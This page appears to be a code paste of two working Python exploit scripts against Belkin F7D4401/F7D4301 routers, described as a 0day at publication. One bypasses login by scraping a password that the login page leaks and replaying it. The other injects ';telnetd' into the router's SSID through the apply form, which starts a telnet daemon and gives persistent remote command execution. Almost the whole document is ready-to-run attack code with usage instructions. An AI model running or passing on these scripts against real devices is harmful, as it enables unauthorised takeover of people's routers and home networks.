Belkin router exploits to bypass login and persistent remote command execution
#!/usr/bin/env python3 | |
# Belkin Router Persistent Remote Command Execution (0day at time of publication, Feb 2017)
# Tested models: F7D4401, F7D4301
# Tested firmware: 1.00.46 (latest firmware as of February 2017)
# You must be logged in to run this exploit (the belkin_login_bypass.py exploit below gets you there first)
# Author BigNerd95
import sys, requests, re | |
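def enable_telnetd(ip):
    """Inject ``;telnetd`` into the router's SSID so the web UI's Apply handler
    runs a telnet daemon.

    The script sends no credentials and keeps no cookies: it relies on the
    caller already being logged in against ``ip`` (see the header comment).
    NOTE(review): that only works if the firmware ties the login state to the
    client address rather than a cookie — implied by the companion script's
    "go with your browser" hint, not verified here.

    Args:
        ip: Router management address (host or host:port), used in plain
            ``http://`` URLs.

    Side effects:
        GET ``/wireless_id.stm``, POST ``/apply.cgi``, progress on stdout.
        Calls ``sys.exit(1)`` when the SSID cannot be read, already contains
        a ``;`` (already injected), or the Apply page is not acknowledged.
    """
    from urllib.parse import quote  # local import: module header untouched

    base = "http://" + ip
    timeout = 10  # seconds; do not hang forever on a silent host
    cmd = "telnetd"  # bare name; the original also lists /usr/sbin/telnetd as an alternative

    print("Getting SSID...")
    wl_page = requests.get(base + "/wireless_id.stm", timeout=timeout)
    ssid = _extract_ssid(wl_page.text)
    if ssid is None:
        print("SSID not found!")
        sys.exit(1)
    if ";" in ssid:
        print("SSID already injected!")
        sys.exit(1)

    if len(ssid) + 1 + len(cmd) > 32:
        print("SSID too long, it will be truncated...")
    new_ssid = _build_injected_ssid(ssid, cmd)

    print("Injecting SSID...")
    # The SSID comes from the router and is dropped into a form-encoded body:
    # percent-encode the whole value (';' -> %3B as before, but also '&', '+',
    # '=', '%' and spaces) so it cannot break or smuggle extra form fields.
    encoded = quote(new_ssid, safe="")
    payload = (
        "page=radio.asp&location_page=wireless_id.stm&wl_bssid=&wl_unit=0"
        "&wl_action=1&wl_ssid=" + encoded
        + "&arc_action=Apply+Changes&wchan=1&ssid=" + encoded
    )
    reply = requests.post(base + "/apply.cgi", data=payload, timeout=timeout)
    # The Apply page answers with a countdown(55) script when it accepted the
    # change; that is the only success signal available.
    if re.search(r"countdown\(55\);", reply.text):
        print("SSID injected!")
    else:
        print("Cannot inject SSID")
        sys.exit(1)


def _extract_ssid(html):
    """Return the SSID literal the wireless page assigns to tF['ssid'], or None."""
    match = re.search(r"document\.tF\['ssid'\]\.value=\"(.*)\";", html)
    return match.group(1) if match else None


def _build_injected_ssid(ssid, cmd, max_len=32):
    """Return ``ssid;cmd``, trimming *ssid* so the result fits in *max_len*.

    32 matches the 802.11 maximum SSID length, which the original exploit
    hard-codes; the command part is never trimmed, only the SSID prefix.
    """
    room = max_len - len(cmd) - 1  # one character for the ';' separator
    return ssid[:room] + ";" + cmd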
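def main():
    """Command-line entry point: ``<script> <belkin_router_ip>``.

    Runs the SSID injection, then tells the operator to wait before
    connecting: the router only acknowledges the change with a countdown
    page, so telnetd is presumably not up immediately.

    A wrong argument count is a usage error: the message goes to stderr and
    the process exits with status 2 instead of returning success.
    """
    if len(sys.argv) != 2:
        print("Usage: " + sys.argv[0] + " <belkin_router_ip>", file=sys.stderr)
        sys.exit(2)  # conventional exit status for a usage error
    target = sys.argv[1]
    enable_telnetd(target)
    print("Wait a minute, then run: telnet " + target)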
# Run only when executed as a script; importing the module has no side effects.
if __name__ == "__main__":
    main()
#!/usr/bin/env python3 | |
# Belkin Login Bypass exploit (the login page leaks the credential it checks against)
# Tested models: F7D4401, F7D4301
# Tested firmware: 1.00.46 (latest firmware as of February 2017)
# Author BigNerd95
import sys, requests, re | |
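def auth_bypass(ip):
    """Log in to the router with the credential its own login page leaks.

    ``/login.stm`` embeds a ``var password = "..."`` JavaScript literal; this
    function scrapes it and replays it in the ``pws`` field of ``/login.cgi``.
    Whether the leaked value is the cleartext password or some derived form
    is not determined here — it is echoed back unchanged.

    No cookies are kept (plain ``requests`` calls, no Session), yet the caller
    is told to continue in a browser. NOTE(review): this presumes the firmware
    binds the login to the client address rather than a cookie — unverified.

    Args:
        ip: Router management address (host or host:port), used in plain
            ``http://`` URLs.

    Side effects:
        GET ``/login.stm``, POST ``/login.cgi``, progress on stdout. Calls
        ``sys.exit(1)`` when no credential is found or the login is rejected.
    """
    from urllib.parse import quote  # local import: module header untouched

    base = "http://" + ip
    timeout = 10  # seconds; do not hang forever on a silent host

    print("Looking for info disclosure...")
    login_page = requests.get(base + "/login.stm", timeout=timeout)
    leaked = _extract_leaked_password(login_page.text)
    if leaked is None:
        print("No info disclosure found!")
        sys.exit(1)
    print("Info disclosure found!")

    print("Logging in...")
    # The scraped value is untrusted page content going into a form-encoded
    # body: percent-encode it so '&', '+', '=', '%' or spaces in the
    # credential cannot corrupt the field list and cause a false "failed".
    payload = (
        "totalMSec=0000000000.000&pws=" + quote(leaked, safe="")
        + "&arc_action=login&pws_temp=&action=Submit"
    )
    reply = requests.post(base + "/login.cgi", data=payload, timeout=timeout)
    # A rejected login answers with content referencing loginpserr.stm; its
    # absence is the only success signal the page gives.
    if re.search(r"loginpserr.stm", reply.text):
        print("Login failed")
        sys.exit(1)
    print("Logged in!")


def _extract_leaked_password(html):
    """Return the string literal assigned to ``var password`` in *html*, or None."""
    match = re.search(r'var password.*=.*"(.*)";', html)
    return match.group(1) if match else None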
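def main():
    """Command-line entry point: ``<script> <belkin_router_ip>``.

    Performs the login bypass and then points the operator at the router's
    web UI. A wrong argument count is a usage error: the message goes to
    stderr and the process exits with status 2 instead of returning success.
    """
    if len(sys.argv) != 2:
        print("Usage: " + sys.argv[0] + " <belkin_router_ip>", file=sys.stderr)
        sys.exit(2)  # conventional exit status for a usage error
    target = sys.argv[1]
    auth_bypass(target)
    print("Go with your browser to http://" + target)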
# Run only when executed as a script; importing the module has no side effects.
if __name__ == "__main__":
    main()